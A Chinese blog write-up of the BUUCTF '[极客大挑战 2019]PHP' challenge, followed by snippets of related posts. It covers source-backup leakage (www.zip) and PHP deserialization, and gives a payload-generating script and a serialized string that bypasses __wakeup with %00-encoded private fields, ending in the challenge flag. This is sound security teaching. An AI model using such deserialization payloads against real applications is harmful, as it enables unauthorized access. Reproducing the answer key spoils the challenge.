[极客大挑战 2019]PHP

最新推荐文章于 2025-04-16 15:19:29 发布
最新推荐文章于 2025-04-16 15:19:29 发布
阅读量1k 收藏 8
点赞数 8
分类专栏: 信息安全 Buuctf Web安全 文章标签: php web安全 系统安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/137788725
版权

buuctf——[极客大挑战 2019]PHP

1.信息收集获取源代码/www.zip
在这里插入图片描述
2.放在phpstudy进行调试,直接输入任意select的值index是没有回显的,直接代码审计
通过index.php可以看到我们输入的参数select的值通过反序列化传入到了class.php
在这里插入图片描述
3.通过class.php我们可以知道, u s e r n a m e 和 username和 usernamepassword是两个私有属性,无法直接修改,依据题意只有使用魔术函数__construct()的方法触发修改用户名和密码
在这里插入图片描述

4.理清题意后直接构造exp

<?php

class Name{
    private $username = 'admin';
    private $password = '100';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$Name = new Name('admin','100');
$payload = serialize($Name);
var_dump($payload);
?>

在这里插入图片描述
5.通过php访问获取到payload
http://127.0.0.1/eazyun/payload.php
在这里插入图片描述
6.因为题目中有__wakeup方法,需要通过改变属性值来绕过
通过将2的值变成3绕过sleep函数
O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

在这里插入图片描述
7.因为username和password是私有属性所以需要使用%00进行绕过
因为name是私有属性,故需要加%00进行绕过
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
在这里插入图片描述
8.最终构造出exp,成功获取flag
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}
在这里插入图片描述
flag{e78d7aed-4e99-446b-9f23-273c92a9bb6f}
在这里插入图片描述

网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 7370
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
极客挑战 2019 PHP
BlueDoorZz的博客
07-12 585
0x00 题型:源码泄露,php反序列化,wakeup方法的绕过。 0x01 提示网站有备份,直接在url后面拼接www.zip,下载到源码。主要代码如下: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> <?php include 'flag.php'; error_reporting(0); class Name{
BUUCTF-[极客挑战 2019]PHP
网络空间安全学习
06-29 917
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
BUUCTF 极客挑战 2019]PHP
最新发布
m0_63017297的博客
04-16 224
1. username=admin才能输出flag,但是wakeup()方法会将username重置位guest。2. destruct方法定义如果password不等于100的话就结束函数。这就是生成链的代码,这样解决了第二点,但是第一点还没有解决,现在要利用PHP。题目提示有备份文件,访问/www.zip,获取源码。阅读了题目之后针对这两个条件我们进行构造链。看到输出flag的条件为。(__wakeup绕过)
[网络安全 CTF] BUUCTF极客挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 767
自我介绍一下,小编13年上海交毕业,曾经在小公司待过,也去过华为、OPPO等厂,18年进入阿里一直到现在。深知多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
2025.2.11——一、[极客挑战 2019]PHP wakeup绕过|备份文件|代码审计
2402_87387800的博客
02-11 1114
题目来源:BUUCTF [极客挑战 2019]PHP
[极客挑战 2019]PHP 1
m0_62879498的博客
04-12 8992
[极客挑战 2019]PHP 1 一进入题目,就有页面提示我们“所以我有一个良好的备份网站的习惯” 所以我们尝试着输入网站源码备份文件,看看能否访问 常见的网站源码备份文件后缀: tar.gz,zip,rar,tar 常见的网站源码备份文件名: webwebsite,backup,back,www,wwwroot,temp 发现www.zip可以成功获得网站源码备份 下载后,发现有3个php文件 我们先访问一下 index.php文件,发现: <?php include 'clas
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值